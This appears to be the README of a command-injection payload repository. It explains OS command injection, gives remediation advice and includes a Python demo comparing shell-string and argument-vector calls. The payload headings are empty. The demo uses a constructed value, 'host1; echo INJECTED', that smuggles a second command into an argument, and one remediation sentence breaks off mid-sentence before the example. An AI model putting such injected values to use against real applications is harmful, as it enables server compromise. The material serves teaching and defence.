Command Injection Payload List
Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application. Command injection attacks are possible when an application passes unsafe user-supplied data (forms, cookies, HTTP headers etc.) to a system shell. In this attack, the attacker-supplied operating system commands are usually executed with the privileges of the vulnerable application. Command injection attacks are possible largely due to insufficient input validation.
This attack differs from Code Injection, in that code injection allows the attacker to add his own code that is then executed by the application. In Command Injection, the attacker extends the default functionality of the application, which executes system commands, without the necessity of injecting code.
What is OS command injection?
OS command injection is a critical vulnerability that allows attackers to gain complete control over an affected web site and the underlying web server.
OS command injection vulnerabilities arise when an application incorporates user data into an operating system command that it executes. An attacker can manipulate the data to cause their own commands to run. This allows the attacker to carry out any action that the application itself can carry out, including reading or modifying all of its data and performing privileged actions.
In addition to total compromise of the web server itself, an attacker can leverage a command injection vulnerability to pivot the attack into the organization's internal infrastructure, potentially accessing any system which the web server can access. They may also be able to create a persistent foothold within the organization, continuing to access compromised systems even after the original vulnerability has been fixed.
Description:
Operating system command injection vulnerabilities arise when an application incorporates user-controllable data into a command that is processed by a shell command interpreter. If the user data is not strictly validated, an attacker can use shell metacharacters to modify the command that is executed, and inject arbitrary further commands that will be executed by the server.
OS command injection vulnerabilities are usually very serious and may lead to compromise of the server hosting the application, or of the application's own data and functionality. It may also be possible to use the server as a platform for attacks against other systems. The exact potential for exploitation depends upon the security context in which the command is executed, and the privileges that this context has regarding sensitive resources on the server.
Remediation:
If possible, applications should avoid incorporating user-controllable data into operating system commands. In almost every situation, there are safer alternative methods of performing server-level tasks, which cannot be manipulated to perform commands other than the one intended.
If it is considered unavoidable to incorporate user-supplied data into operating system commands, the following two layers of defense should be used to prevent attacks:
- The user data should be strictly validated. Ideally, a whitelist of specific accepted values should be used. Otherwise, only short alphanumeric strings should be accepted. Input containing any other data, including any conceivable shell metacharacter or whitespace, should be rejected.
- The application should use command APIs that launch a specific process via its name and command-line parameters, rather than passing a command string to a shell interpreter that supports command chaining and redirection. For example, the Java API Runtime.exec and the ASP.NET API Process.Start do not support shell metacharacters. This defense can mitigate
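The two layers above, shown as an added example in Python (not code from this repository): a shell-string call next to the argument-vector form, plus the allowlist check. The function names, the `lookup` command and the sample inputs are constructed for illustration, and the unsafe variant assumes a POSIX `/bin/sh`.

```python
import re
import subprocess
import sys

# Layer 1: allowlist. Only short alphanumeric values pass. fullmatch() is used
# so a trailing newline cannot slip through the way it can with "$".
ALLOWED = re.compile(r"[A-Za-z0-9]{1,32}")

# Stand-in for the real server-side tool (assumption, so the demo runs
# offline): a child process that only reports the arguments it received.
CHILD = [sys.executable, "-c", "import sys; print(sys.argv[1:])"]


def validate(value):
    """Return value unchanged if it passes the allowlist, else raise."""
    if not isinstance(value, str) or ALLOWED.fullmatch(value) is None:
        raise ValueError("rejected input: %r" % (value,))
    return value


def run_unsafe(value):
    """BEFORE: user data is concatenated into a string parsed by a shell."""
    cmd = "echo lookup " + value
    return subprocess.run(cmd, shell=True, capture_output=True,
                          text=True, timeout=10).stdout


def run_argv(value):
    """Layer 2 alone: program name plus argument vector, no shell involved.

    Metacharacters arrive as literal bytes in one argument. A value starting
    with "-" could still be read as an option by the target program, which
    is one reason layer 1 is kept in front of this call.
    """
    return subprocess.run(CHILD + [value], capture_output=True,
                          text=True, timeout=10).stdout.strip()


def run_safe(value):
    """AFTER: both layers, validation first, then the argument vector."""
    return run_argv(validate(value))


if __name__ == "__main__":
    sample = "host1; echo INJECTED"   # constructed input with a metacharacter
    print("shell string :", run_unsafe(sample).splitlines())
    print("argv only    :", run_argv(sample))
    print("both layers  :", run_safe("host1"))
    try:
        run_safe(sample)
    except ValueError as exc:
        print("both layers  :", exc)
```

With the shell string, the second command runs on its own line of output; with the argument vector the same input reaches the child as a single literal argument, and with validation in front it never reaches a process at all.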
Unix :
Windows :
Cloning an Existing Repository ( Clone with HTTPS )
root@ismailtasdelen: # git clone https://github.com/ismailtasdelen/command-injection-payload-list.git
Cloning an Existing Repository ( Clone with SSH )
root@ismailtasdelen: # git clone git@github.com:ismailtasdelen/command-injection-payload-list.git